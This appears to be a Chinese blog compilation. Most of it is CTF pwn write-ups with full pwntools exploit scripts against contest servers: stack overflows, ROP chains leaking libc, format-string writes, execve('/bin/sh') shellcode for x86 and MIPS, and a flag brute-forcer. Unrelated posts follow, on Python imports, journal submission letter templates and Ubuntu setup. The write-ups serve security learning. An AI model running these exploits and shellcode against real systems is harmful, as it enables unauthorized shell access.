• linux内核基础:Linux内核设计与实现 linux设备驱动程序 深入理解linux内核
  • 汇编语言:基于linux环境
  • 程序员的自我修养
  • 软件调试
  • Reverse Engineering for beginners
  • debug hacks 中文版
  • binary hacks:https://github.com/shihyu/Linux_Programming/blob/master/books/Binary.Hacks%20%E9%BB%91%E5%AE%A2%E7%A7%98%E7%AC%88100%E9%80%89.pdf
  • 内核漏洞的利用与防范
  • 逆向工程基本原理
  • 加密与解密
  • 0day
  • 漏洞战争

 

附:

web安全:Web安全深度剖析 《黑客攻防技术宝典:WEB实战篇》

 

  • break *0x400100(b main), 在0x400100处下断点,tb, 一次性断点,info b,查看断点信息,delete [number] ,删除断点,watch *(int *)0x08044530,在内存0x08044530处的数据改变时stop
  • x /4xg $ebp, 查看ebp开始的4个8字节内容,(b表示单字节,h表示双字节,w表示四字节,g表示八字节;x表示十六进制输出,s表示字符串输出,i表示反汇编,c表示单字符)
  • p $eax, 输出eax内容, set $eax = 4,修改变量值
  • c继续运行,r重新开始运行,ni单步步过,si单步步入,fini运行至函数刚刚结束处,return expression,将函数返回值指定为expression
  • bt,查看函数调用
  • info f,查看当前栈帧,context查看运行上下文,stack查看当前堆栈
  • call func,强制函数调用
  • ropgagdet,找common rop
  • vmmap,查看虚拟地址分布
  • shellcode,搜索,生成shellcode
  • ptype struct link_map,查看link_map定义
  • p &((struct link_map*)0)->l_info,查看l_info成员的偏移

  • scanf(“%s”),可以读’\x00’字符,不截断
  • 连续read之间加sleep进行缓冲, read与fread区别:read不会压栈,相当于直接syscall,fread会压栈
  • 忽略某信号 trap “” signal , 例如 trap “” SIGALRM ,忽略时钟信号, gdb “handle SIGALRM nostop noprint”
  • socat tcp-l:6666,reuseaddr,fork exec:”LD_PRELOAD=./libc.so.6 ./pwn 6666″
  • IDA pro: idapython findbinary(here(), SEARCH_DOWN, “61 62 63″) 从当前位置开始搜索”abc”
  • libc可以用来leak heap地址,fastbins[10]或者normalbins
  • pwntools dynelf 获取两个函数地址相对偏移,获取偏移之后leak一次即可获得system地址
  • pwntools 停止发送信息,p.shutdown(‘send’)
  • 程序运行之后找字符串,system(“sh”)通常也是可行的
  • 插入NULL bytes,http://phrack.org/issues/58/4.html
  • gcc 编译shellcode :gcc -fno-stack-protector -z execstack -o bug bug.c
  • 64 bit call parameters RDI, RSI, RDX, RCX, R8, R9,rop 利用见 linux x64 rop利用总结
  • asm(‘sub rsp, 4; jmp rsp’, arch=’amd64′)
  • roputils 关于rop的各种利用方法集合
  • patchelf修改动态链接程序的ld.so路径以及加载库

PWN1:(Careful)

明显的栈溢出,通过指定v3可以覆盖返回地址,想要构造shellcode太短了,只能写10个字节,注意到i也在栈上,所以可以重置计数器,

最后exp如下:

#!/usr/bin/env python
from pwn import *

DEBUG=0
if DEBUG:
    p = process("./bin/A44DD70F78267A1CCBEE12FE0D490AD6")
    context.log_level = 'debug'
else:
    p = remote("106.75.37.29", 10000)


def resetCounter():
    p.recvuntil("input index:")
    p.sendline("28")
    p.recvuntil("input value:")
    p.sendline(str(0x0))

def writeAddress(start, addr):
    data = hex(addr)[2:].rjust(8,'0')
    print data
    p.recvuntil("input index:")
    p.sendline(str(start))
    p.recvuntil("input value:")
    p.sendline(str(int(data[6:],16)))

    p.recvuntil("input index:")
    p.sendline(str(start+1))
    p.recvuntil("input value:")
    p.sendline(str(int(data[4:6],16)))

    p.recvuntil("input index:")
    p.sendline(str(start+2))
    p.recvuntil("input value:")
    p.sendline(str(int(data[2:4],16)))

    p.recvuntil("input index:")
    p.sendline(str(start+3))
    p.recvuntil("input value:")
    p.sendline(str(int(data[:2],16)))

def setCounter():
    p.recvuntil("input index:")
    p.sendline("28")
    p.recvuntil("input value:")
    p.sendline(str(0x10))


def exp():
    writeAddress(44, 0x08048420) #scanf
    writeAddress(48, 0x080486ae) #pop pop ret
    resetCounter()

    writeAddress(52, 0x080486ed) # %d
    writeAddress(56, 0x0804a200) # /bin
    resetCounter()

    writeAddress(60, 0x08048420) #scanf
    writeAddress(64, 0x080486ae) #pop pop ret
    resetCounter()

    writeAddress(68, 0x080486ed) #%d
    writeAddress(72, 0x0804a204) #/sh
    resetCounter()

    writeAddress(76, 0x080483e0) #plt@system
    writeAddress(84, 0x0804a200)

    raw_input("bp2")
    setCounter()

    p.sendline(str(u32('/bin')))
    p.sendline(str(u32('/sh\x00')))

    p.interactive()

exp()

PWN2:(Cis2)

还是栈溢出,注意到handle_op_code中没有对safe_stack 进行边界检查,可以溢出返回地址,将payload放到全局数组buffer里,跳转到buffer即可。

Exp如下:

#!/usr/bin/env python
from pwn import *

DEBUG=0
if DEBUG:
    p = process("./bin/0A77F6D4BD5CB2700A89F9C6F8D8F116")
else:
    p = remote("106.75.37.31", 23333)

def exp():
    p.recvuntil("Fight!\n")
    for i in range(30):
        p.sendline(str(0x602088))

    p.sendline('m')
    p.sendline('w')
    p.sendline('w')
    p.sendline('w')
    p.sendline('-')
    raw_input("bp")
    payload="\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
    p.sendline('q'+'a'*7+payload)

    p.interactive()


exp()

PWN3 mips

第一次接触mips架构的题目,汇编代码看了半天,有个点没get到,最后没有解出来,后来看了别人的wp之后,才发现真的就差一点,栈溢出是非常明显的

并且程序输入某个值可以打印处栈地址,而且没开nx,后面就直接覆盖返回地址为stack上放置payload的地址即可。

from pwn import *

#context.log_level = 'debug'
#context.update(arch='mips', endian='little')
p = remote("106.75.32.60", 10000)

p.recvuntil("help.\n")


p.sendline('2057561479')
p.recvuntil("0x")
stack_addr = int(p.recv(8), 16)

print "stack_addr =>", hex(stack_addr)
p.sendline('1'*0x70+p32(stack_addr+8))
p.recv()

payload = 'a'*8
payload += "\xff\xff\x10\x04"
payload += "\xab\x0f\x02\x24"
payload += "\x55\xf0\x46\x20"
payload += "\x66\x06\xff\x23"
payload += "\xc2\xf9\xec\x23"
payload += "\x66\x06\xbd\x23"
payload += "\x9a\xf9\xac\xaf"
payload += "\x9e\xf9\xa6\xaf"
payload += "\x9a\xf9\xbd\x23"
payload += "\x21\x20\x80\x01"
payload += "\x21\x28\xa0\x03"
payload += "\xcc\xcd\x44\x03"
payload += "/bin/sh"

p.sendline(payload)
p.recv()

p.sendline('exit')
p.interactive()

1. PWN1 tc

Linux下的保护机制基本都没开,查看程序逻辑,发现我们输入的一个变量值v6会决定函数指针v7,其中 funcs是一个全局数组,并没有对v6值进行判断,因此我们可以通过设置v6的值让函数指向某个地址,观察全局变量区我们发现存在buf这个全局数组,而这个字符数组内容是在readIntergers函数中由用户输入的,因此我们可以控制buf的前四个字节为buf+4的地址,buf+4开始为linux shell的payload。

   

Exp如下:

#!/usr/bin/env python

from pwn import *



DEBUG = 0

buf_addr = 0x0804a0a0

#context.log_level = 'debug'

if DEBUG:

    p = process("./bin/tc1")

else:

    p = remote('106.75.9.11', 20000)



def exp():

    p.recvuntil("Divide\n")

    p.sendline("29")

    p.recvuntil("]\n")

    payload = p32(buf_addr+4)

    payload += "\x6a\x0b"

    payload += "\x58"

    payload += "\x31\xf6"

    payload += "\x56"

    payload += "\x68\x2f\x2f\x73\x68"

    payload += "\x68\x2f\x62\x69\x6e"

    payload += "\x89\xe3"

    payload += "\x31\xc9"

    payload += "\x89\xca"

    payload += "\xcd\x80"

    #raw_input("set bp")

    p.sendline(payload)

    p.interactive()


exp()

2. PWN2 echo-200

这个程序是一个静态链接的程序,checksec发现只开启了stack canary.

   

下面查看程序逻辑,逻辑比较简单,只是不断的读字符和打印字符 

 

注意到while循环里printf存在明显的格式化串漏洞,没开nx,我们就可以考虑直接将linux 获取shell的shellcode放在buffer里,利用思路如下:首先leak出buffer地址,根据size与buffer的相对偏移计算出size的地址,然后将size改为0x200,扩大buffer的size之后,下面就是劫持程序流程,我们可以计算出调用printf时返回地址与buffer的偏移,从而将返回地址修改为buffer中的某个地址,完整的利用exp如下:  

#!/usr/bin/env python
from pwn import *

DEBUG = 0
if DEBUG:
	p = process('./bin/echo-200')
else:
	p = remote('106.75.9.11', 20001)

context.log_level = 'debug'
def exp():
    p.recvuntil("\n")
    p.sendline("%5$x")
    buf_addr = u32(p.recvuntil('\n')[:-1].decode('hex')[::-1])
    print "buf_addr =>", hex(buf_addr)
    p.recvuntil("\n")
    payload = p32(buf_addr-0xc)
    payload += "%"+str(0x200-4)+"c"
    payload += "%7$hn"
    p.sendline(payload)
    p.recvuntil('\n')
    ret_addr = buf_addr - 0x20
    payload_addr = buf_addr + 0x100
    print "payload_addr =>", hex(payload_addr)
    payload_low_addr= payload_addr & 0xffff
    payload_high_addr = payload_addr >> 16
    if payload_high_addr > payload_low_addr:
	payload2 = p32(ret_addr)
	payload2 += p32(ret_addr+2)
	payload2 += '%'+str(payload_low_addr - 8)+'c'
	payload2 += "%7$hn"
	payload2 += '%'+str(payload_high_addr - payload_low_addr)+'c'
	payload2 += "%8$hn"
	payload2 += 'a'*(0x100- len(payload2))
	payload2 += "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
    else:
	payload2 = p32(ret_addr+2)
	payload2 += p32(ret_addr)
	payload2 += '%'+str(payload_high_addr - 8)+'c'
	payload2 += "%7$hn"
	payload2 += '%'+str(payload_low_addr - payload_high_addr)+'c'
	payload2 += "%8$hn"
	payload2 += 'a'*(0x100- len(payload2))
	payload2 += "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"

    p.sendline(payload2)
    p.interactive()

exp()

 

3. PWN3 qwb3

这个程序开启了NX,查看程序逻辑,发现vulnerable_function函数存在明显的栈溢出,主要在于怎么利用

   

开始的思路是构造rop去leak write函数和read函数的地址,然后利用libc-database去找对应的libc,后来leak出来之后发现没有对应的libc版本,接下来想到直接用pwntools的dynelf去爆破system函数地址,与leak出来的write函数地址计算偏移。下次攻击时只需要leak处write函数便可计算出system函数地址,最后就是构造rop去写/bin/sh,并传给system函数,此处可以参考http://drops.wooyun.org/papers/7551,里面介绍了一段x64下一段比较通用的gadget,exp如下:

#!/usr/bin/env python
from pwn import *

DEBUG = 0
main = 0x40049d
binsh_addr = 0x601300

if DEBUG:
    p = process("./bin/qwb3")
    offset = 0x9c6d0
else:
    p = remote("106.75.8.230", 19286)
    offset = 0x9cc20

def leak(addr):
    payload = 'a'*72
    payload += p64(0x400631) # pop rsi, pop r15, ret
    payload += p64(addr) 
    payload += 'b'*8
    payload += p64(0x4005b6) 
    p.sendline(payload)
    data = p.recv(8)
    log.debug("%#x => %s" %(addr, (data or '').encode('hex')))
    p.recv()
    return data

def exp():
    '''
    p.recvuntil("\n")
    d = DynELF(leak, main, elf=ELF('./bin/qwb3'))
    system_addr = d.lookup('system', 'libc')
    write_addr = d.lookup('write', 'libc')
    print "system_addr =>", hex(system_addr)
    print "offset =>", hex(write_addr - system_addr)
    p.interactive()
    '''
    p.recvuntil("\n")
    payload = 'a'*72
    payload += p64(0x400631) # pop rsi, pop r15, ret
    payload += p64(0x601018) #got_write
    payload += p64(0)
    payload += p64(0x400633) # pop rdi, ret
    payload += p64(1) 
    payload += p64(0x400450) # plt_write
    payload += p64(0x400631) # pop rsi, pop r15, ret
    payload += p64(binsh_addr) # buf
    payload += p64(0) #rbp
    payload += p64(0x400633) # pop rdi, ret
    payload += p64(0)
    payload += p64(0x400460) # r12 read@got
    payload += p64(0x40059d) # vuln_function
    #raw_input("bp")
    p.sendline(payload)
    write_addr = u64(p.recv(8))
    system_addr = write_addr - offset
    print "system_addr =>", hex(system_addr)
    #raw_input("bp2")
    p.sendline('/bin/sh'+'\x00')
    payload2 = 'a'*72
    payload2 += p64(0x400633)  #pop rdi, ret
    payload2 += p64(binsh_addr)  #
    payload2 += p64(system_addr)
    p.sendline(payload2)
    p.recv()
    p.interactive()

exp()

4. PWN4

主程序逻辑如下:

 

其中,welcome函数和inputName函数分别是打印信息和输入用户名,checkFlag函数大概逻辑是要求你输入flag,并根据你输入的flag的长度与远程的flag相应前几个对应字符进行对比,匹配与不匹配时输出的信息不一样,这里就存在爆破的可能,首先爆破第一个字符,成功后继续爆破第二个,依次破解单个字符

 

Exp如下:

#!/usr/bin/env python
from pwn import *
import string
import time

whole_flag = ""
isCorrect = False

def exp(flag):
    global whole_flag
    global isCorrect
    p = remote('106.75.8.230', 13349)
    p.recvuntil("YOUR NAME:")
    p.sendline('aaa')
    p.recvuntil("again?\n")
    p.sendline('aaa')
    p.recvuntil("FLAG: ")
    p.sendline(flag)
    result = p.recv()
    if result.find("submit")>=0:
        whole_flag = flag
        isCorrect = True
        print "current flag:", flag,
    p.close()

#exp(whole_flag)
while len(whole_flag) < 20:
    isCorrect = False
    for i in string.ascii_letters+string.digits+'{_}':
        exp(whole_flag+i)
        time.sleep(0.5)
        if isCorrect == True:
            break
    if not isCorrect:
        print whole_flag
        break

print "whole flag:", whole_flag

  1. SQL盲注
  2. 树状数组/线段树
  3. Chrome控制台调试js
  4. python库
    • networkx 图论库(最短路径、连通子集)
    • bs4(html解析)
    • requests(爬虫)
    • bitstream(二进制流读写)
    • pp(程序并行,多cpu利用)
  5. awk(官方手册:http://www.gnu.org/software/gawk/manual/gawk.html)和 sed
  6. flash逆向工程
  7. webarchive
  8. RSA破解:
    • 大整数分解(yafu或者msieve)以及RSATool
    • 求乘法逆元(python的gmpy2库)
    • powmod(python内置函数pow(c,d,n))
  9. 数学求解——wolframalpha
  10. HTTP协议,断点续传相关,请求:Range:bytes=1111-1112 响应:Content-Range: bytes

继续阅读

首先,要明确一点的是,不管是python2还是python3,如果脚本里使用了相对路径,都无法直接运行该模块。如果要单独运行该模块,需要使用 python -m module_name 这种方式。

python3导入时,采用绝对路径。

python2导入时,采用相对路径。

继续阅读

SCI 投稿全过程信件模板一览:

一、最初投稿Cover letter

Dear Editors:

We would like to submit the enclosed manuscript entitled “Paper Title”, which we wish to be considered for publication in “Journal Name”. No conflict of interest exits in the submission of this manuscript, and manuscript is approved by all authors for publication. I would like to declare on behalf of my co-authors that the work described was original research that has not been published previously, and not under consideration for publication elsewhere, in whole or in part. All the authors listed have approved the manuscript that is enclosed.

In this work, we evaluated …… (简要介绍一下论文的创新性). I hope this paper is suitable for “Journal Name”. The following is a list of possible reviewers for your consideration:

1) Name A   E-mail: ××××@××××
2) Name B   E-mail: ××××@××××

We deeply appreciate your consideration of our manuscript, and we look forward to receiving comments from the reviewers. If you have any queries, please don’t hesitate to contact me at the address below.

Thank you and best regards.

Yours sincerely,
××××××
Corresponding author: 
Name: ×××
E-mail: ××××@××××

二、催稿信

Dear Prof. ×××:

Sorry for disturbing you. I am not sure if it is the right time to contact you to inquire about the status of my submitted manuscript titled “Paper Title”. (ID: 文章稿号), although the status of “With Editor” has been lasting for more than two months, since submitted to journal three months ago. I am just wondering that my manuscript has been sent to reviewers or not?

I would be greatly appreciated if you could spend some of your time check the status for us. I am very pleased to hear from you on the reviewer’s comments. Thank you very much for your consideration.

Best regards! 
Yours sincerely,
××××××
Corresponding author: 
Name: ×××
E-mail: ××××@××××

三、修改稿Cover letter

Dear Dr/ Prof..(写上负责你文章编辑的姓名,显得尊重,因为第一次的投稿不知道具体负责的编辑,只能用通用的Editors):

On behalf of my co-authors, we thank you very much for giving us an opportunity to revise our manuscript, we appreciate editor and reviewers very much for their positive and constructive comments and suggestions on our manuscript entitled “Paper Title”. (ID: 文章稿号).

We have studied reviewer’s comments carefully and have made revision which marked in red in the paper. We have tried our best to revise our manuscript according to the comments. Attached please find the revised version, which we would like to submit for your kind consideration.

We would like to express our great appreciation to you and reviewers for comments on our paper. Looking forward to hearing from you. Thank you and best regards.

Yours sincerely,
××××××
Corresponding author:
Name: ×××
E-mail: ××××@××××

四、修改稿回答审稿人的意见(最重要的部分)

List of Responses

Dear Editors and Reviewers:

Thank you for your letter and for the reviewers’ comments concerning our manuscript entitled “Paper Title” (ID: 文章稿号). Those comments are all valuable and very helpful for revising and improving our paper, as well as the important guiding significance to our researches. We have studied comments carefully and have made correction which we hope meet with approval. Revised portion are marked in red in the paper. The main corrections in the paper and the responds to the reviewer’s comments are as flowing:

Responds to the reviewer’s comments:

Reviewer #1:

1. Response to comment: (……简要列出意见……)

Response: ××××××

2. Response to comment: (……简要列出意见……)

Response: ×××××× 。。。。。。

逐条意见回答,切忌一定不能有遗漏

针对不同的问题有下列几个礼貌术语可适当用用:

  • We are very sorry for our negligence of ………
  • We are very sorry for our incorrect writing ………
  • It is really true as Reviewer suggested that……
  • We have made correction according to the Reviewer’s comments.
  • We have re-written this part according to the Reviewer’s suggestion
  • As Reviewer suggested that……
  • Considering the Reviewer’s suggestion, we have ……

最后特意感谢一下这个审稿人的意见:

Special thanks to you for your good comments.

Reviewer #2:

同上述

Reviewer #3:

××××××

Other changes:

  1. Line 60-61, the statements of “……” were corrected as “…………”
  2. Line 107, “……” was added
  3. Line 129, “……” was deleted ××××××We tried our best to improve the manuscript and made some changes in the manuscript. These changes will not influence the content and framework of the paper. And here we did not list the changes but marked in red in revised paper. We appreciate for Editors/Reviewers’ warm work earnestly, and hope that the correction will meet with approval.

Once again, thank you very much for your comments and suggestions.

五、文章接受后可以考虑感谢一下负责你文章的编辑或主编(根据需要)

Dear Prof. ××××××:

Thanks very much for your kind work and consideration on publication of our paper. On behalf of my co-authors, we would like to express our great appreciation to editor and reviewers. Thank you and best regards.

Yours sincerely,
××××××
Corresponding author:
Name: ×××
E-mail: ××××@××××

六、询问校稿信件(如果文章接受后时间较长)

Dear ×××:

Sorry for disturbing you. I am not sure if it is the right time to contact you to inquire about the status of our accepted manuscript titled “Paper Title” (ID: 文章稿号), since the copyright agreement for publication has been sent to you two months ago. I am just wondering that how long I can receive the proof of our manuscript from you? I would be greatly appreciated if you could spend some of your time for a reply. I am very pleased to hear from you.

Thank you very much for your consideration.

Yours sincerely,
××××××
Corresponding author:
Name: ×××
E-mail: ××××@××××

七、文章校稿信件

Dear Mr. ×××:

Thanks very much for your kind letter about the proof of our paper titled “Paper Title” (ID: 文章稿号) for publication in “Journal Name”. We have finished the proof reading and checking carefully, and some corrections about the proof and the answers to the queries are provided below.

Corrections:

  1. In should be (Page , Right column, line**)
  2. In the “” should be “” (Page , Right column, line*) Answers for “author queries”:
  3. *********************.


We greatly appreciate the efficient, professional and rapid processing of our paper by your team. If there is anything else we should do, please do not hesitate to let us know.

Thank you and best regards.

Yours sincerely,
××××××
Corresponding author:
Name: ×××
E-mail: ××××@××××

转自: SecDr

安装阿里源

14.04源

deb http://mirrors.aliyun.com/ubuntu/ trusty main restricted universe multiverse
deb http://mirrors.aliyun.com/ubuntu/ trusty-security main restricted universe multiverse
deb http://mirrors.aliyun.com/ubuntu/ trusty-updates main restricted universe multiverse
deb http://mirrors.aliyun.com/ubuntu/ trusty-proposed main restricted universe multiverse
deb http://mirrors.aliyun.com/ubuntu/ trusty-backports main restricted universe multiverse
deb-src http://mirrors.aliyun.com/ubuntu/ trusty main restricted universe multiverse
deb-src http://mirrors.aliyun.com/ubuntu/ trusty-security main restricted universe multiverse
deb-src http://mirrors.aliyun.com/ubuntu/ trusty-updates main restricted universe multiverse
deb-src http://mirrors.aliyun.com/ubuntu/ trusty-proposed main restricted universe multiverse
deb-src http://mirrors.aliyun.com/ubuntu/ trusty-backports main restricted universe multiverse

12.04的源只需要将里面的trusty换成precise即可。
将给内容覆盖/etc/apt/sources.list内容即可。(最好先备份一下)

安装pycharm、shadowsocks

sudo add-apt-repository ppa:mystic-mirage/pycharm  # 添加 pycharm ppa源

sudo add-apt-repository ppa:hzwhuang/ss-qt5 # 添加 ss-qt5 ppa源(14.04及以上支持)

sudo apt-get update

sudo apt-get install pycharm/pycharm-community

添加之后如果遇到ppa源无法连接到的问题,可以通过Ubuntu自带的update-manager工具查看是否ppa源添加过多或者存在其他问题。

安装open-in-terminal

sudo apt-get install nautilus-open-terminal

安装中文输入

进入【settings】-> 【Lanuage Support】,点击 Install/Remove Languages,选择Chinese(simplified),点击 Apply Changes开始安装中文支持,安装成功后,在终端输入 ibus-setup,进行输入法配置,进入 Input Method标签页,添加 Chinese-Pinyin输入法即可。

附:

Ubuntu虚拟机安装之后登陆黑屏的解决方法:设置Ubuntu虚拟机的显示器,取消【加速3D图形】选项